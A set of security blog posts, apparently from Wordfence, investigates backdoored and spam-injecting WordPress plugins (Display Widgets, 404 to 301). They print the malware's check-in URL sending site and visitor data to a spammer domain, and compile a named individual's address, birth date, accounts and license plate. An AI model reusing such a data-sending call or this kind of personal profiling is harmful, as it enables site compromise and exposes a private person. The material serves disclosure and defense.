Categories
Security

The Man Behind Plugin Spam: Mason Soiza

This is a follow-up to our story titled “Display Widgets Plugin Includes Malicious Code to Publish Spam on WP Sites“. In this post, we explore who is behind the purchase and corruption of the Display Widgets plugin and at least two other popular WordPress plugins.

As part of my research into the sale of the Display Widgets plugin and the subsequent spam that appeared in it, I had reached out to Stephanie Wells, the original author of Display Widgets who sold it. Stephanie got back to me moments after I hit the publish button on our post.

We had a chat on Skype and she was incredibly concerned, helpful and forthcoming with data to try and clear up what exactly happened here. Steph has kindly agreed to let me share the details of their transaction with the WordPress community.

I was really excited because this allowed us to follow the money in our investigation into who is behind the spam in Display Widgets. Little did I know that this would lead to two other plugins and shed light on a story we wrote about last year.

Following The Money

Steph confirmed that they had sold the Display Widgets plugin to “Mason Soiza” for $15,000. He had approached them via their web contact form. This is the original email they received, complete with spelling errors:

–Begin email–

We would like to purchase this plugin from you and take complete owner ship of it and take away the stress from you.

We are trying to build one of the largest wordpress plugin companies and in doing this we are trying to purchase some rather large plugins like yours.

I am wondering if me and my team would be able to purchase this plugin from you and then take over the complete development of it and push out a new update to make it work better with the latest wordpress.

We will also put our admin team onto the support forum and make sure the users are happy and if there are any features they are specifically asking for we will get them added in to the next update.

We have over 34 Plugins that we now own and manage.

–End email–

During their negotiations they received a further email from Soiza on April 24th which read:

–Begin email–

We have 1 plugin per account as WordPress do not really like the fact that people sell or buy the plugins so this protects us as the buyer from one of the previous owners from “snitching” and then crashing all our other plugins.

I can name drop a few however:

https://wordpress.org/plugins/wp-slimstat/ <– managed by Dino
https://wordpress.org/plugins/finance-calculator-with-application-form/ <– bought 2 days ago as we have a great concept on growing htis and really wanted the name “Finance Calculator” still needs the designer to jump on.
https://en-gb.wordpress.org/plugins/404-to-301/<– bought this a few weeks back still in process of transferring , they have had bad press in the past so we want to fix it and also improve on the current version in terms of “auto 404 fix”.

We have many others but these are most recent.

To be brutally honest,

It helps with our web business that is pretty big in the casino industry, when we can use as a sales tactic “Our code is used on over 30million websites” world wide etc etc. Sounds silly but it goes along way in our industry, especially as we need to evident our statements by law.

–End email–

Notice I’ve marked the “404 to 301” plugin in red. We’ll come back to that.

The plugin was no longer a core part of Steph and her husband’s business, so they decided to sell it.

The paypal transaction from May 19th, 2017 to purchase Display Widgets reads: Mason Soiza (pp@linkrocket.net) made a $15,000.00 USD payment

The contract that Steph received is signed by Mason Soiza.

On June 21st, the first release of Display Widgets under the new author went out. Then on June 30th there was a second release, version 2.6.1, which included the malicious code we covered in part 1 of this series of posts. To remind you, this code allowed the new plugin author – Soiza, in this case – to publish spam content on any site running Display Widgets. There were approximately 200,000 sites using Display Widgets at the time.

The Trac ticket that Calvin Ngan opened 7 weeks ago, which was the first report of the malicious code and activity in Display Widgets, reported Payday Loan spam. This is an important fact, as you’ll see below.

Who Is Mason Soiza?

The contract that Stephanie received is signed by Mason Soiza. The company name used on the contact is:

Soiza Limited of Jubilee Cottage, Nottingham, England, NG122LD.

Companies House in the UK shows Soiza Limited as:

The address is a complete match to the address and company name provided on the invoice. The company has one corporate officer, Mason Reece Soiza, born March 1994 (age 23), a British citizen, appointed to the board on December 6th, 2016. His occupation is listed as Computer Programmer.

The email that Soiza used in the transaction is pp@linkrocket.net. If we visit the site linkrocket.net, it doesn’t provide much other than a logo. However, if we look at an archived version of it from May 2014, three emails appear on the home page, and we get Mason Soiza’s real email address, which is mason@linkrocket.net.

Using an email search engine called Pipl, we searched for mason@linkrocket.net and found a long list of social profiles.

Included is a LinkedIn profile for Mason Soiza in Nottingham. The profile pic has now been removed from his LinkedIn profile page but this is a screen capture.

Soiza’s LinkedIn profile lists him as CEO of “Payday Loans Now” since 2014.

If we visit www.paydayloansnow.co.uk, we discover at the top left of the page the following:

The footer of the page looks like this:

The pertinent data in this footer is:

  • Paydayloansnow.co.uk is confirmed to belong to Soiza Internet Marketers Limited (SIML).
  • SIML is an “introducer appointed representative” of Quint Group Limited.
  • SIML is entered on the Financial Services Register in the UK under reference number 748266
  • Quint Group Limited is entered on the Financial Services Register under reference number 669450
  • SIML’s company number is 09861376

Lets go to the Financial Services Register and look up SIML’s reference number. We find it listed as follows. You can click the image for a larger version which opens in a new tab.

And on the FCA we find the email address mason@inkrocket.net. This may be a typo because the domain ‘inkrocket.net’ doesn’t actually exist. The actual domain should probably be (l)inkrocket.net.

Who Does Soiza Represent?

Based on data from the UK’s Financial Conduct Authority, “Soiza Internet Marketers Limited” is authorized to introduce clients to Quint Group Limited. Quint provides the financial services that Soiza is selling.

Soiza also operates www.unsecuredloans4u.co.uk which is also reselling Quint’s financial products.

I phoned Quint in the UK and was escalated to their compliance director, Graham McGifford, who was very responsive. He told me that Quint does have standards they require their representatives to adhere to and they will take action if needed.

Quint confirmed that Mason Soiza is an authorized representative, or ‘introducer,’ as the FCA’s website calls it.

Graham requested that I send him more information so that they can look into the matter. We will be forwarding this blog post.

Linking Mason Soiza to the 404 to 301 Plugin Spam

You will recall that in Soiza’s own email to Steph (above) which he sent in April of this year while negotiating the purchase of the Display Widgets plugin, he mentioned that he bought the 404 to 301 plugin:

https://en-gb.wordpress.org/plugins/404-to-301/<– bought this a few weeks back still in process of transferring , they have had bad press in the past so we want to fix it and also improve on the current version in terms of “auto 404 fix”.

In August of 2016, we wrote a story titled “404 to 301 Plugin Considered Harmful“. This was a controversial piece and we posted a follow-up titled “We will always put our customers and community first“.

In the follow-up, we mention that the spam from the 404 to 301 plugin was appearing on school websites in the UK and in particular, a UK based “escort” service called cityofescorts.co.uk had appeared on a school website. This is the code that was fetching the spam content for the 404 301 plugin:

And this is an obfuscated screenshot we included in our August 2016 post:

If you do a whois lookup on cityofescorts.co.uk, you discover that the owner is Mason Soiza.

The wpcdn.io server that was being used to serve spam to the “404 to 301” plugin is still up and running today. And if you visit the URL at wpcdn.io that was being used to serve up spam today, it serves up paydayloansnow.co.uk, which we have shown is another Soiza website.

Soiza says he bought 404 to 301. I reached out to the original plugin author, Joel James, to see if that is true. I haven’t been able to contact him.

Back in August of last year, Joel James wrote on this blog:

Did Joel James give Soiza commit access to his code? I would really like to hear more about what exactly happened. Soiza is now saying he purchased the plugin, but we don’t know if that was before or after the 404 to 301 debacle unfolded. Joel if you could comment here to help us understand the timeline, that would be really helpful.

What About the Other Plugins Soiza Bought?

In his email to Steph, Soiza mentions two other plugins. The notes to the right of each arrow are his:

https://wordpress.org/plugins/wp-slimstat/ <– managed by Dino
https://wordpress.org/plugins/finance-calculator-with-application-form/ <– bought 2 days ago as we have a great concept on growing htis and really wanted the name “Finance Calculator” still needs the designer to jump on.

I have not been able to connect with the author of ‘WP Slimstat’.

I did manage to connect with Ciprian Popescu, author if the “Finance Calculator” plugin that Soiza says he purchased and Ciprian was kind enough to share the details with me.

Soiza contacted Ciprian early this year and used an alias of “Kevin Danna”. He expressed interest in buying Finance Calculator.

Soiza then purchased Finance Calculator for $600. During his communication with Ciprian, Mason Soiza appeared to make an error and he accidentally signed one of his emails from the Kevin Danna alias as ‘Mason’. Ciprian shared a screenshot with me:

Soiza also appears to use the Kevin Danna alias on WordPress forums.

Ciprian told me that for some reason, Soiza never updated the plugin after he purchased it. After learning about what happened with Display Widgets, he has taken back control of the Finance Calculator plugin, revoked Soiza’s access and confirmed that it is malware free. I received this message from him:

Hi Mark,

I can confirm that my plugin has not been tampered with. I have pushed an update to remove the ‘financecalculator’ committer, which was Mason Soiza. I am in the process of updating more stuff, such as rewriting some code for a smaller footprint; but the plugin is fully functional and malware-free.

My Communication With Soiza

We now have hard evidence, courtesy of Ciprian, that Soiza uses the “Kevin Danna” email address to communicate with people. We also know that the new owner of Display Widgets plugin was using that address on WordPress forums.

I communicated with “Kevin Danna” via email while researching our previous post. I asked about the “34 plugins” mentioned on the wpdevs.co.uk website that they owned. I also wanted to know if the malicious code in Display Widgets was there intentionally. This is the reply I received from “Kevin”. I published this in our previous post and left out the first few paragraphs. I’m including them this time to give you a sense of who this person is.

Hi Mark,

Just seen this email WOW!

My side of the story is, as you may/may not know. I got diagnosed with Lung Cancer a few months ago, so only have a few months/maybe a year left on this earth. So i sold up all my plugins to numerous people.

The Display Widgets plugin was sold to a company in California who made me sign a NDA. Probably due to the reasons you have highlighted. This is the only plugin i sold to this “guy”. He claims to have lots of “drupal” plugins and this was his first wordpress plugin. I bought this plugin for $15,000 and sold it for $20,000. They told me they was using it to advertise there toolbar, which i suppose you could use to search them up.

In regards to the 34 plugins and counting, that was at the peak of my career. I would buy plugins brand them up towards say a “web design” business on the /wp-admin/ and then sell the web design business along with the plugin with words like “Used by over 100,000+ websites” adding words like that etc inflated the price of the business by xyz and then i would simply flip it as quick as i could. WP Devs is now a defunct company for obvious reasons.

I apologise for any inconvenience i have caused in directly. I wish you the best of luck!.

Thanks

Kevin D

We know that Soiza bought the Display Widgets plugin from Steph and bought Ciprian’s Financial Calculator plugin. We know that Soiza communicates using the Kevin Danna email address. We also know that Mason Soiza owns the domains used for spamming in the “404 to 301” plugin. We also know that Steph sold her plugin for $15,000 to Mason Soiza. The above email is actually the first time I had heard the number mentioned. We also know that the wpdevs.co.uk website was only registered in April, so it’s not an old business from the “peak” of someone’s career.

So I’m going to go out on a limb here and say that Kevin Danna is actually Mason Soiza and based on Soiza’s public Facebook Profile, he is looking quite healthy.

Other Interests

According to a Whoisology search using Soiza’s email address, he owns the following domains:

  • onlineblackjackexpert.net (Active blackjack site)
  • 0xd0d78w2.info (Listed with Google as serving up malware. See below)

Before Google blocked it, the 0xd0d78w2.info domain was serving up a site that claimed your computer was infected and tried to get you to call a “Microsoft” support line. It looked like this (courtesy of Archive.org):

Business Is Good

Soiza appears to live the high life. On his public Facebook profile, he posts that he attended the Monaco Grand Prix in May of this year.

In April he was at Dead Rabbit in New York ($16 a cocktail).

Last year someone with the name “Mason Reece Soiza” posted a photo of their 2012 Ferrari 458 Italia on rate-drive-co.uk. The thread was discussing an “idiot driver” driving a red Ferrari 458 Italia 2012 model. The license plate is “MA52 SON”.

Business appears to be booming for Soiza.

Wrapping It Up

Our team has assembled a lot of data on Mason Soiza from public sources. He has interests in a wide range of online business that include payday loans, gambling and ‘escort’ services, among others.

He has been active on black hat forums and has been banned from “Black Hat World” (username LinkRocket) and from WickedFire.com (username MasonSoiza). Soiza is active on Reddit as IIRR and moderates a a subreddit called /r/paydayloansnowcouk.

At this point we have confirmed that Soiza purchased the Financial Calculator plugin and the Display Widgets plugin and we have established a financial trail. He added a backdoor to the Display Widgets WordPress plugin to allow himself unlimited publishing access to sites running the plugin.

We also know that Soiza was involved in the spam that originated from the “404 to 301” plugin which he says he bought, although in that case the author has not yet confirmed the sale of the plugin. His escort website and payday loans websites were spammed from the “404 to 301” plugin.

If you are contacted by “Kevin Danna” or “Mason Soiza” and are a plugin author, we advise you to avoid all contact.

As always I welcome your feedback in the comments.

Thanks and Credits

A big thanks to Steph Wells, original author of the Display Widgets plugin who provided the initial financial data we needed to follow the money. Also a huge thanks to Ciprian Popescu, author of the Financial Calculator plugin, who also shared transaction data with me and a screenshot that confirmed Soiza uses the Kevin Danna alias. Both plugin authors worked with me on very short notice, so thank you!!

Also a huge thanks to our team who dropped everything and worked to rapidly build up a profile of Soiza. I’ve mentioned their names on the blog before, but just about everyone pitched in on this post, so you can hit our About page to see who they are. Special thanks to Matt Barry who recognized the connection between Soiza and the “404 to 301” plugin during our research.

The post The Man Behind Plugin Spam: Mason Soiza appeared first on Wordfence.

Categories
Security

Display Widgets Plugin Includes Malicious Code to Publish Spam on WP Sites

If you have a plugin called “Display Widgets” on your WordPress website, remove it immediately. The last three releases of the plugin have contained code that allows the author to publish any content on your site. It is a backdoor.

The authors of this plugin have been using the backdoor to publish spam content to sites running their plugin. During the past three months the plugin has been removed and readmitted to the WordPress.org plugin repository a total of four times. The plugin is used by approximately 200,000 WordPress websites, according to WordPress repository. (See below)

Wordfence warns you if you are using a plugin that has been removed from the repository. During the past months you would have been warned several times that this plugin has been removed with a ‘critical’ level warning that looks like this:

It turns out that this plugin did have “unknown security issues”. Let’s start with a timeline of what happened to Display Widgets, why it was removed three times from the repository and allowed back in each time and then finally removed again a fourth time a few days ago.

A Timeline of “Display Widgets” Bad Behavior

On June 21st a plugin called Display Widgets was sold by its owner to a user known as ‘displaywidget’ on the WordPress.org forums. That new owner released version 2.6.0 of the plugin.

On June 22nd, David Law, a UK based SEO consultant sent an email to the WordPress.org plugin team letting them know that the Display Widgets plugin was installing additional code from an external server. The plugin was downloading a large Maxmind IP geolocation database of around 38 megabytes from the author’s own server. This is not allowed for WordPress plugins in the repository.

On June 23rd, the plugin team removed Display Widgets from the repository. There was some discussion about this on the WordPress.org forums.

Then on June 30th, 7 days later, the developer released version 2.6.1 of the plugin. This release contained a file called geolocation.php which, no one realized at the time, contained malicious code. 

The code in geolocation.php allowed the plugin author to post new content to any website running the plugin, to a URL of their choosing. They could also update content and remove content. Furthermore, the malicious code prevented any logged-in user from seeing the content. In other words, site owners would not see the malicious content.

David Law again contacted the plugin team and let them know that the plugin is logging visits to each website to an external server, which has privacy implications.

On July 1st the plugin was once again removed from the WordPress repository.

On July 6th version 2.6.2 of Display Widgets was released and it again included the malicious code referenced above which had still gone unnoticed by anyone. It included a change to the logging code which was disabled by default and included an on/off option. At the time David Law let the WordPress.org plugin team know that this was not enough in his opinion and they ended up disagreeing on the issue.

On July 23rd, Calvin Ngan opened a Trac ticket reporting that Display Widgets was injecting spammy content into his website. He included a link to Google results that had indexed the spam and said the malicious code is in geolocation.php.

On the 24th of July the WordPress.org plugin team removed Display Widgets from the plugin repository for a third time.

On the 2nd of September version 2.6.3 of the plugin was released and it included the same malicious code. Line 117 of geolocation.php in version 2.6.3 even contains a minor bug fix to the malicious code, which makes it clear that the authors themselves are maintaining the malicious code and understand its operation.

On September 7th a forum user on WordPress.org reports that spam has been injected into their website on the Display Widgets plugin support forum.

The author responds on September 8th saying:

“thank you for letting me know. Yes, the last update fixed this you need to clear your cache and update to the latest version. As I mentioned in the changelog, I asked a friend of mine to review the code and he gave me a full report. You can look at the wp_options table for leftovers, and if you don’t find anything then you should be okay.”

And then another reply from someone else sharing the same ‘displaywidget’ user account (spelling mistakes included):

Hi,

The other admin here. Unfortunately the addition of the GEO Location made the software vulnerable to a exploit if used in conjunction with other popular plugins.

The latest update fixed and sanitised the vulnerability. A simple empty of the cache & clearing of the wp_options table (if affected) should remove that post.

Again i apologise. But this should fix it. We estimate only around 100 or so sites to be comprimised.

Thanks

DW

The malicious code is not an exploit. It is a backdoor giving the author access to publish content on websites using the plugin. It does not require ‘other popular plugins’ to work.

The second poster says “only around 100 or so sites” are compromised. Actually, the backdoor exists on any site running versions 2.6.1 to version 2.6.3 of the plugin. Considering the time-span of 2.5 months between those releases, that would mean that these two or more people have access to publish anything they like on most of the 200,000 sites the plugin is installed on.

On September 8th the plugin was removed for a fourth time from the WordPress plugin repository. This time we hope it is permanent.

Wordfence Issued ‘Critical’ Alert Each Time Plugin Was Removed

On June 15th of this year, Wordfence added a feature to alert you if a plugin is removed from the repository. We did this because in the past, plugins have been removed because they have a security issue. It turns out that this feature helped users recognize that there was a security issue with this plugin.

We started alerting when this plugin was first removed, over two months ago:

 

We then continued to alert as the plugin was removed from the repository and re-added several times, as is the case in this forum post:

I’m incredibly proud that our team took the initiative and got this feature released in June of this year, just in time to save many of our free and paid customers from being affected by this malicious plugin.

Could This Have Been Accidental?

It is worth considering that the plugin author may have accidentally included an external library that contained someone else’s malicious code without realizing it. In fact the second poster on September 8th says:

Unfortunately the addition of the GEO Location made the software vulnerable to a exploit if used in conjunction with other popular plugins.”

This suggests they used an external library and weren’t aware of the ‘vulnerability’.

They were maintaining the malicious code

The 2.6.3 release of their plugin makes a minor modification to the malicious code in geolocation.php to fix a bug in the code that lets the plugin author list the malicious posts they have published on your site.

Then in the latest release there is a major change. They break out the code that is pulling down the spam into a separate function called endpoint_request() and switch to using the domain stopspam.io instead of using geoip2.io. Both domains are hosted on the same IP address. They also base64 encode the domain name in an attempt to hide the name of the domain they are fetching spam from.

The authors of the plugin are actively maintaining their malicious code, switching between sources for spam and working to obfuscate (hide) the domain they are fetching spam from.

The authors operate the domain the spam is fetched from

On July 4th, one of the plugin authors says this in a post:

So I registered address geoip2.io to provide service for “unlimited” requests. I purchased ip2location Pachage for a project of mine a while ago, so I can use with no problem, as long as I do not sell similar service to ip2location.

The authors admit they registered and own the geoip2.io domain name. The stopspam.io domain which they later switch to is hosted at the same IP address which is 52.173.202.113.

The authors were caught lying

The authors of Display Widgets sold the plugin to the new plugin owners and have said so on their website.

On approximately July 4th, one of the authors sharing the ‘displaywidget’ account posted that they did not buy the plugin, calling it “fake news”:

“out of curiosity, where does it say that I purchased this plugin? See? This is exactly why people like Trump win: because of fake information being spread, and because of people who believe in anything they read without checking the reliability of those sources. I’d like to know where this rumor that “money was exchanged” started.”

The former authors at Strategy11 have a clear message on their site saying that the plugin was ‘purchased’:

Why would the new owners of the plugin lie about the plugin being purchased? Who knows, but it provides data showing that they are willing to lie publicly while accusing others of doing the same.

Who is Behind Display Widgets and the ‘displaywidget’ Username?

In the heat of an argument on the WordPress forms, one of the authors sharing the ‘displaywidget’ username includes the following in a post:

Please keep your own un-educated thoughts to your self and stop trying to advertise your FORK of the real plugin on my support pages. Instead please contact kevin.danna@wpdevs.co.uk and please provide who ever you contact, with that email address.

They sign the post “Kevin”.

If you visit the ‘wpdevs.co.uk’ domain name you’ll find a site that wants to buy WordPress plugins:

They claim to have “34 plugins and counting”. This suggests that whoever bought the Display Widgets plugin is operating this business. There is no further info about “Kevin Danna” or the business available.

Which 34 plugins does this company own?

This company and the individuals behind it appear to be responsible for injecting malicious code into a plugin used by over 200,000 websites. If they have 33 other plugins, we would like to know which they are. I reached out to the kevin.dana@wpdevs.co.uk email address and received a reply which I have included below. The reply suggests that the “34 plugins” claim may not be true. 

Are they really based in the UK? 

The company says that they are based in the UK on their home page. Their domain is also a UK domain name. And yet, one of the plugin authors said in a post on July 4th:

Apologies for the delay. Please consider that it is Independence Day weekend here in the United States, and even plugin developers deserve to spend some quality time with their families, don’t you think?

Is this another example of one of the authors lying? Or is one of them based in the United States and the company is based in the UK?

A possible Russia linguistic connection

I’m moving into the realm of speculation here, but something struck me as I was reading some of the plugin authors comments. These are extracts from the forum posts from the account that the two authors share. You can find all posts here.

Notice the following phrases which I’ve extracted from posts by ‘displaywidget’. Everything in square parentheses has been added by me and was a linguistic error by the poster.

  • “so I can use [it] with no problem”
  • “as long as I do not sell [a] similar service to ip2location”
  • “have access to [the] IP addresses of those using [the] service”
  • “Why do I collect also [the] website URL?”
  • “websites are abusing of this free service”
  • “people think I [am] try[ing] to take advantage of something”

This indicates that at least one of the individuals sharing the ‘displaywidget’ account is a non-native english speaker. It is a common mistake for Russians to omit the article when speaking english. That is the most common mistake made in the examples above.

This may indicate that at least one of the authors is either based in eastern Europe or of eastern European origin.

Kevin Replies to My Email

I sent the kevin.danna@wpdevs.co.uk email address a request for comment on this story. I asked specifically about the wpdevs website claiming that he has 34 plugins and whether the code to add spam content was included intentionally. I received a reply. I am excluding the first four sentences which includes some personal detail. This is the rest of his reply:

—Begin quoted email—

*snip*… So i sold up all my plugins to numerous people.

The Display Widgets plugin was sold to a company in California who made me sign a NDA. Probably due to the reasons you have highlighted. This is the only plugin i sold to this “guy”. He claims to have lots of “drupal” plugins and this was his first wordpress plugin. I bought this plugin for $15,000 and sold it for $20,000. They told me they was using it to advertise there toolbar, which i suppose you could use to search them up.

In regards to the 34 plugins and counting, that was at the peak of my career. I would buy plugins brand them up towards say a “web design” business on the /wp-admin/ and then sell the web design business along with the plugin with words like “Used by over 100,000+ websites” adding words like that etc inflated the price of the business by xyz and then i would simply flip it as quick as i could. WP Devs is now a defunct company for obvious reasons.

I apologise for any inconvenience i have caused in directly. I wish you the best of luck!.

—end quoted email—

I sent Kevin a follow-up request for more information. I pointed out that the wpdevs.co.uk domain was registered in April of this year according to Nominet. I also pointed out that archive.org have no record of anything on the domain prior to that.

I’ll leave it up to the reader to draw your own conclusions.

The Technical Functioning of Malicious Code in DisplayWidgets

The most recent version of the plugin hooks into the ‘wp’ action which runs on each request to the WordPress front-end. When this hook is first run after the plugin’s activation, it makes a request to the spammer’s server to “check in” with the following parameters:

http://stopspam[dot]io/api/update/?url=&agent=&v=1&p=4&ip=&siteurl=

If we break that into bullets for readability it is:

  • url=
  • agent=
  • v=1
  • p=4
  • ip=
  • siteurl=

This “check in” call acts to notify the spammer that a new site or installation can be configured to host backlinks or other spam content.

The plugin has separate actions that allow an unauthenticated user (the spammer in this case) to create or update posts/pages at a user-supplied slug with content that is pulled down from the stopspam.io domain.

The content that can be pulled down from the spammer domain includes script tags that could be used for an XSS attack. The attack would not be able to target logged-in users of the site because content is hidden from them. However, it could target users who are not logged in and gain access their sensitive data via an XSS attack.

The following URLs can be accessed by the spammers (plugin authors in this case) to create, modify and delete content on a website running the affected versions of this plugin:

As you can see, the authors have even included a convenient ‘bulk’ deletion function to remove all traces.

The spammers were previously using the geoip2.io domain to fetch spam. They later switched to stopspam.io and neatened up their code slightly. The spammers have several domains they are using, all hosted at the same IP address 52.173.202.113:

  • stopspam.io registered July 2, 2017.
  • geoip2.io registered 24 July, 2017.
  • w-p.io registered 11 July, 2017
  • maxmind.io registered 24 July, 2017

Wrapping It Up

As I mentioned in the introduction, Wordfence would have warned you each time this plugin was removed from the repository. It is important that you have Wordfence installed and have your email alerts configured. Make sure you pay attention and respond when needed. We have several reports from users who say they did respond to this Wordfence alert and removed the malicious plugin.

You are welcome to share your thoughts in the comments. Please note that many of the forum moderators and plugin repository maintainers are volunteers. Please do not judge them harshly – in general they do a pretty darn good job of keeping an extremely large repository and support forum system running smoothly for the most popular CMS on earth.

I would also ask you to not start any witch hunts. I’m sure some folks are angry about what transpired here, but things happen and if you were on top of security, you would have been notified that the plugin was removed from the repository and you would have removed it from your site. Occasionally plugins change ownership and very rarely, that doesn’t go well. That appears to be what happened in this case.

Mark Maunder – Wordfence Founder/CEO.

Credits

A number of people contributed to this post. Firstly I’d like to thank David Law. He was the first person to raise a concern about this plugin and pursued his case relentlessly on the WP forums with, at times, resistance from the plugin authors and others. Thanks David for looking out for the rest of us. David was also kind enough to exchange several lengthy emails with me to help establish a timeline – one of them was at 5am his time.

I’d also like to thank Matt Barry, Brad Haas, Kathy Zant, James Yokobosky, Dan Moen, Asa Rosenberg and Matt Rusnak on our team, for their assistance with this post.

I also tried to contact Stephanie Wells, the original author of the plugin via her website and via LinkedIn and she was not immediately available for comment.

UPDATE: I just completed a Skype call with Stephanie, the original author of the plugin. She has been incredibly open and honest about this whole situation. They (she runs a business with her husband) are good people and she freely shared data with me that will help tremendously with our investigation. Stephanie clearly cares deeply for the WordPress community and security in general. I can tell she is deeply disappointed by how this worked out and wants to do everything she can to help. My team and I are still processing the data she shared, but will most likely post a follow-up.

The post Display Widgets Plugin Includes Malicious Code to Publish Spam on WP Sites appeared first on Wordfence.

Categories
Security

404 to 301 Plugin Considered Harmful

Yesterday we received a site cleaning request where one of our customers was seeing spammy links, Payday Loans in this case, injected into their WordPress website page content. The links were only appearing when the site was visited by a search engine crawler. This is common when a site has been hacked.

An extract from the customer communication with personal info removed:

We look after a clients website [website removed] and believe that has been compromised.

Specifically, the issue is that when google or bing’s search bots crawl the site, they see some text injected into the top of the homepage. I have been using a user agent switcher to verify it’s presence but it was first spotted when we did a pagespeed test here: [removed] and it showed in their ‘preview’ screengrab on the desktop view.

This text seems isn’t always present and when it is there it’s only on the home url (not actually the page eg. if you visit [page removed] it doesn’t appear).

[snip]

For reference, the block of injected text appears under the site header (navigation etc.) and also in the body of our exit-intent popup:

Make Ends Meet With Payday Loans

It is often very easy to face any financial emergency if you have adequate money to pay for them. But, this can seem all too impossible if you often live from one paycheck to another. How will you be able to pay for your urgent financial emergencies? Most often than not, you can’t. Face the reality, when your job is unable to pay for your financial emergencies, it is best to turn to payday loan providers out there.

[rest of content removed including link to payday loans site]

Screen Shot 2016-08-16 at 10.59.59 AMIt turns out that this is not a hacked site. It is content that is injected by a plugin called 404 to 301 plugin which has 70,000 active installs and has a 4.5 star review from 56 reviewers. When you install the plugin it asks you to agree to a long agreement which includes parts of the GNU general public license. But at the end it also includes the following text (you have to scroll down to find it):

 

Third Party Text Links

Third party text networks supply text for display in 404 to 301. These networks may collect your visitors’ IP addresses, in native or hashed forms, for purposes of controlling the distribution of text links. 404 to 301 collects anonymous aggregated usage statistics.

By clicking the button here below, you agree to the terms and conditions and give permission to place text links on your website when search engine crawlers access it. Your website’s layout, performance and interaction with human visitors should not be altered or affected in any way. Please note that this feature can be deactivated at any time under 404 to 301 Setting > Help & Info > Plugin Information > Disable UAN, without affecting any other feature available in 404 to 301.

404 to 301 – Copyright © 2016.

I’m reasonably sure that no sane webmaster would agree to:

  1. Cloaking, which is specifically banned by Google and will result in a search engine penalty.
  2. Allowing ads to be inserted into their site over which they have no editorial control, including PayDay loan ads.

We are contacting the WordPress plugin repository maintainers who will likely remove the plugin by the time you read this post. Now that you’re fully informed, we suggest you make up your own mind about whether or not you want to keep this plugin installed if you have it on your site.

As always we welcome your comments. Please note: We have disabled comments on this post due to the inflammatory nature of some of the comments we’re receiving.

All company, product and service names used in this website are for identification purposes only. Use of these names, logos, and brands does not imply endorsement.

The post 404 to 301 Plugin Considered Harmful appeared first on Wordfence.

Categories
Security

Seo-moz.com SEO Spam Campaign

Here at Sucuri we handle countless cases of SEO spam. This malware involves a website being compromised in order to spread (mostly pharmaceutical) advertisements by linking visitors to unwanted websites and stuffing spam keywords into the site. These links and keywords help the spam websites to rank higher in search engines like Google, sending even
Read More

The post Seo-moz.com SEO Spam Campaign appeared first on Sucuri Blog.